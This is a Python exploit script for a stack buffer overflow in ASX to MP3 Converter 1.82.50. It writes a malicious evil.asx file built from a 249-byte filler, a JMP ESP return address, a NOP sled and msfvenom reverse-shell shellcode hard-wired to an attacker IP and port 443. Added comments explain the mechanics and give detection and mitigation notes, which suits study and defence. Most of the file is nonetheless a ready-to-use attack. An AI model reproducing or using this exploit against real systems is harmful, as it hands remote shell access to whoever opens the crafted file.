#!/usr/bin/python
# ASX to MP3 Converter 1.82.50 SOF exploit
# Software: https://www.exploit-db.com/apps/b7c8c2a232e1d4a959c43970a877a799-ASXtoMP3Converter.exe
# Date: 02 Oct 2022
# Reference:
# Author: Dylan Jenkins
# Based on PoC by the totally real person: Ivan Ivanovic Ivanov
# Reference: https://www.exploit-db.com/exploits/38382/
# Tested on: Windows 2k3
# EIP Offset: 249
# Bad Chars: x00\x09\x0a\x1a
# Return Address | dll: 0x1003789d ("\xFF\xEF", JMP ESP) | MSA2Multility03.dll
# Usage: Open ASX to MP3 Converter application > load evil asx file
#
# What this script actually does (review summary):
#   It is a stand-alone generator for a malformed playlist file. It builds a
#   fixed-layout 1000-byte buffer in memory, prints it, and writes it to
#   `evil.asx` in the current working directory. Nothing here opens a
#   network connection: `socket` and `time` are imported but never used in
#   the visible code. The embedded bytes in `shellcode` are, per the
#   msfvenom comment below, a reverse-shell payload hard-wired to the
#   LHOST/LPORT shown there.
#
# Defender notes:
#   - Detection: a playlist/.asx file whose content is a run of hundreds of
#     identical 0x41 ('A') bytes followed by binary data is not a valid ASX
#     document and is a strong indicator of an overflow probe against the
#     parser; content inspection of playlist files on ingest catches this.
#   - Root cause class: unbounded copy of an attacker-controlled field from
#     the .asx file into a fixed-size stack buffer (classic stack overflow).
#     Mitigations on the host side are DEP/ASLR-enabled builds of the
#     consuming application and not opening untrusted playlist files.
import socket
import time
import sys
# Padding that reaches the saved return address; the count matches the
# "EIP Offset: 249" value in the header comment.
filler = "A" * 249
# Little-endian encoding of the return address named in the header comment.
eip = "\x9d\x78\x03\x10"
# Short NOP sled placed ahead of the payload.
nops = "\x90" * 10
# Code used to generate payload:
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.176 LPORT=443 -f python -b "\x00\x09\x0a\x1a" -v shellcode
# Encoded payload bytes emitted by the msfvenom command above; the bytes
# listed in the "Bad Chars" header are excluded by the encoder.
shellcode = b""
shellcode += b"\xbe\xb3\x11\x41\xb4\xd9\xc0\xd9\x74\x24\xf4"
shellcode += b"\x5a\x29\xc9\xb1\x52\x31\x72\x12\x03\x72\x12"
shellcode += b"\x83\x59\xed\xa3\x41\x61\xe6\xa6\xaa\x99\xf7"
shellcode += b"\xc6\x23\x7c\xc6\xc6\x50\xf5\x79\xf7\x13\x5b"
shellcode += b"\x76\x7c\x71\x4f\x0d\xf0\x5e\x60\xa6\xbf\xb8"
shellcode += b"\x4f\x37\x93\xf9\xce\xbb\xee\x2d\x30\x85\x20"
shellcode += b"\x20\x31\xc2\x5d\xc9\x63\x9b\x2a\x7c\x93\xa8"
shellcode += b"\x67\xbd\x18\xe2\x66\xc5\xfd\xb3\x89\xe4\x50"
shellcode += b"\xcf\xd3\x26\x53\x1c\x68\x6f\x4b\x41\x55\x39"
shellcode += b"\xe0\xb1\x21\xb8\x20\x88\xca\x17\x0d\x24\x39"
shellcode += b"\x69\x4a\x83\xa2\x1c\xa2\xf7\x5f\x27\x71\x85"
shellcode += b"\xbb\xa2\x61\x2d\x4f\x14\x4d\xcf\x9c\xc3\x06"
shellcode += b"\xc3\x69\x87\x40\xc0\x6c\x44\xfb\xfc\xe5\x6b"
shellcode += b"\x2b\x75\xbd\x4f\xef\xdd\x65\xf1\xb6\xbb\xc8"
shellcode += b"\x0e\xa8\x63\xb4\xaa\xa3\x8e\xa1\xc6\xee\xc6"
shellcode += b"\x06\xeb\x10\x17\x01\x7c\x63\x25\x8e\xd6\xeb"
shellcode += b"\x05\x47\xf1\xec\x6a\x72\x45\x62\x95\x7d\xb6"
shellcode += b"\xab\x52\x29\xe6\xc3\x73\x52\x6d\x13\x7b\x87"
shellcode += b"\x22\x43\xd3\x78\x83\x33\x93\x28\x6b\x59\x1c"
shellcode += b"\x16\x8b\x62\xf6\x3f\x26\x99\x91\xff\x1f\xd6"
shellcode += b"\xd1\x68\x62\x18\x13\xd2\xeb\xfe\x79\x34\xba"
shellcode += b"\xa9\x15\xad\xe7\x21\x87\x32\x32\x4c\x87\xb9"
shellcode += b"\xb1\xb1\x46\x4a\xbf\xa1\x3f\xba\x8a\x9b\x96"
shellcode += b"\xc5\x20\xb3\x75\x57\xaf\x43\xf3\x44\x78\x14"
shellcode += b"\x54\xba\x71\xf0\x48\xe5\x2b\xe6\x90\x73\x13"
shellcode += b"\xa2\x4e\x40\x9a\x2b\x02\xfc\xb8\x3b\xda\xfd"
shellcode += b"\x84\x6f\xb2\xab\x52\xd9\x74\x02\x15\xb3\x2e"
shellcode += b"\xf9\xff\x53\xb6\x31\xc0\x25\xb7\x1f\xb6\xc9"
shellcode += b"\x06\xf6\x8f\xf6\xa7\x9e\x07\x8f\xd5\x3e\xe7"
shellcode += b"\x5a\x5e\x4e\xa2\xc6\xf7\xc7\x6b\x93\x45\x8a"
shellcode += b"\x8b\x4e\x89\xb3\x0f\x7a\x72\x40\x0f\x0f\x77"
shellcode += b"\x0c\x97\xfc\x05\x1d\x72\x02\xb9\x1e\x57"
# Trailing padding sized so that filler + eip + nops + shellcode + offset
# comes to exactly 1000 bytes (the 4 is the width of `eip`).
offset = "B" * (1000-len(filler)-4-len(nops)-len(shellcode))
# Buffer Structure:
# AAAAA.AAAA + EIP + NOP...NOP + shellcode + BBB....BBB
inputBuffer = filler + eip + nops + shellcode + offset
# Create buffer asx file and print to user
print("\n .asx file buffer file creator, run as sudo/admin for file creation rights \n")
print("\nCreating evil asx file buffer to test control of EIP\n")
print("\ninput buffer is:\n")
print(inputBuffer)
print("\nlength of buffer is:\n")
print(len(inputBuffer))
print("\ncreatingfile: evil.asx\n")
# Writes the buffer to `evil.asx` in the current working directory, in text
# mode; the file is the only artifact this script produces.
f = open("evil.asx", "w")
f.write(inputBuffer)
f.close()
print("\nclosing\n")
sys.exit()